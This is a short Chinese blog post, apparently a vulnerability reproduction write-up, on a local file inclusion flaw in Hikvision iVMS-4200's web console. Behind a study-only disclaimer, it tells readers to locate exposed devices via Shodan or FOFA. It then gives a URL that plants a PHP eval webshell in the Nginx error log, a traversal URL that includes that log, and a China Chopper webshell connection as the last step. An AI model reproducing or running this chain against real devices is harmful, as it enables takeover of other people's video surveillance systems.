1. 程式人生 > 實用技巧 >Hikvision iVMS 4200 /index.php 本地檔案包含漏洞復現

Hikvision iVMS 4200 /index.php 本地檔案包含漏洞復現

宣告

本文內容僅供學習交流使用,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良後果與文章作者無關。


一、漏洞介紹

iVMS-4200適用於嵌入式網路硬碟錄影機、混合型網路硬碟錄影機、網路視訊伺服器、NVR、IP Camera和解碼裝置以及視音訊編解碼卡,支援實時預覽、遠端回放和下載、資源管理、遠端配置、使用者管理、系統配置等多種功能。

簡單來說,它包含了一個WEB版的控制檯,用到了一個比較小眾的框架,然後被這個Xphp的框架賣了。

漏洞出現在controller引數的一個任意檔案包含。

二、查詢裝置

利用shodan、FOFA等查詢iVMS-4200的裝置

三、漏洞復現

1、首先構造URL訪問,使其記錄在error.log中

http://xxx.xxx.xxx.xxx:xx/<?eval($_POST['pass'])?>

2、直接包含這個客戶端自帶的Nginx日誌檔案

http://xxx.xxx.xxx.xxx:xx/index.php?controller=../../../../Server/logs/error.log%00.php 

(此處不截圖,自行測試檢視)

3、中國菜刀連線